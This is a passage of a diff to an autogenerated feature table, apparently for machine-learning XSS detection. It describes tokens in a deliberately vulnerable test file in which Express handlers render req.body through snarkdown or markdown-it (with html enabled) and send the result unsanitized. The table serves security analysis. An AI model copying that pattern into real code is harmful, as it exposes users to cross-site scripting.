autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:3:84:31 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:7:84:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:7:84:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:7:84:10 | send | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:7:84:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:7:84:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:20 | snarkdown | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:20 | snarkdown | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:20 | snarkdown | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:20 | snarkdown | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:20 | snarkdown | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | exceptional return of snarkdown(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | exceptional return of snarkdown(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | exceptional return of snarkdown(req.body) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | exceptional return of snarkdown(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | exceptional return of snarkdown(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20028,6 +134262,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:12:84:30 | snarkdown(req.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:24 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:24 | req | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:24 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:29 | req.body | CalleeFlexibleAccessPath | snarkdown | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:29 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:29 | req.body | calleeImports | snarkdown | @@ -20036,6 +134275,46 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:29 | req.body | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:29 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:22:84:29 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:26:84:29 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:26:84:29 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:26:84:29 | body | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:26:84:29 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:84:26:84:29 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:5 | res | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:10 | res.send | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | exceptional return of res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | exceptional return of res.sen ... .body)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | exceptional return of res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | exceptional return of res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | exceptional return of res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | res.sen ... .body)) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | res.sen ... .body)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | res.sen ... .body)) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | res.sen ... .body)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:3:85:32 | res.sen ... .body)) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:7:85:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:7:85:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:7:85:10 | send | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:7:85:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:7:85:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:21 | snarkdown2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:21 | snarkdown2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:21 | snarkdown2 | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:21 | snarkdown2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:21 | snarkdown2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | exceptional return of snarkdown2(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | exceptional return of snarkdown2(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | exceptional return of snarkdown2(req.body) | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | exceptional return of snarkdown2(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | exceptional return of snarkdown2(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -20044,6 +134323,11 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:12:85:31 | snarkdown2(req.body) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:25 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:25 | req | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:25 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:25 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:30 | req.body | CalleeFlexibleAccessPath | snarkdown2 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:30 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:30 | req.body | calleeImports | snarkdown | @@ -20052,6 +134336,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:30 | req.body | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:30 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:23:85:30 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:27:85:30 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:27:85:30 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:27:85:30 | body | enclosingFunctionBody | req res res send req body res send snarkdown req body res send snarkdown2 req body | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:27:85:30 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:85:27:85:30 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:88:16 | markdownIt | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:88:16 | markdownIt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:88:16 | markdownIt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:88:16 | markdownIt | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:90:2 | markdow ... true\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:90:2 | markdow ... true\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:90:2 | markdow ... true\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:90:2 | markdownIt | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:90:2 | markdownIt | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:7:90:2 | markdownIt | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:26 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:26 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:26 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:41 | exceptional return of require ... wn-it') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:41 | exceptional return of require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:41 | exceptional return of require ... wn-it') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:41 | require ... wn-it') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:41 | require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:88:41 | require ... wn-it') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:90:2 | exceptional return of require ... true\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:90:2 | exceptional return of require ... true\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:90:2 | exceptional return of require ... true\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:90:2 | require ... true\\n}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:90:2 | require ... true\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:20:90:2 | require ... true\\n}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:28:88:40 | 'markdown-it' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:28:88:40 | 'markdown-it' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:28:88:40 | 'markdown-it' | calleeImports | | @@ -20064,6 +134378,15 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:43:90:1 | {\\n html: true\\n} | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:43:90:1 | {\\n html: true\\n} | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:88:43:90:1 | {\\n html: true\\n} | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:6 | html | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:6 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:6 | html | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:12 | html: true | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:12 | html: true | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:12 | html: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:12 | html: true | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:12 | html: true | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:3:89:12 | html: true | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:9:89:12 | true | CalleeFlexibleAccessPath | import(!) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:9:89:12 | true | InputAccessPathFromCallee | 0.html | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:9:89:12 | true | InputArgumentIndex | 0 | @@ -20072,6 +134395,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:9:89:12 | true | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:9:89:12 | true | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:89:9:89:12 | true | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:17 | markdownIt2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:17 | markdownIt2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:17 | markdownIt2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:17 | markdownIt2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:46 | markdow ... t')({}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:46 | markdow ... t')({}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:46 | markdow ... t')({}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:46 | markdownIt2 | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:46 | markdownIt2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:7:91:46 | markdownIt2 | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:27 | require | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:27 | require | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:42 | exceptional return of require ... wn-it') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:42 | exceptional return of require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:42 | exceptional return of require ... wn-it') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:42 | require ... wn-it') | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:42 | require ... wn-it') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:42 | require ... wn-it') | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:46 | exceptional return of require ... t')({}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:46 | exceptional return of require ... t')({}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:46 | exceptional return of require ... t')({}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:46 | require ... t')({}) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:46 | require ... t')({}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:91:21:91:46 | require ... t')({}) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked 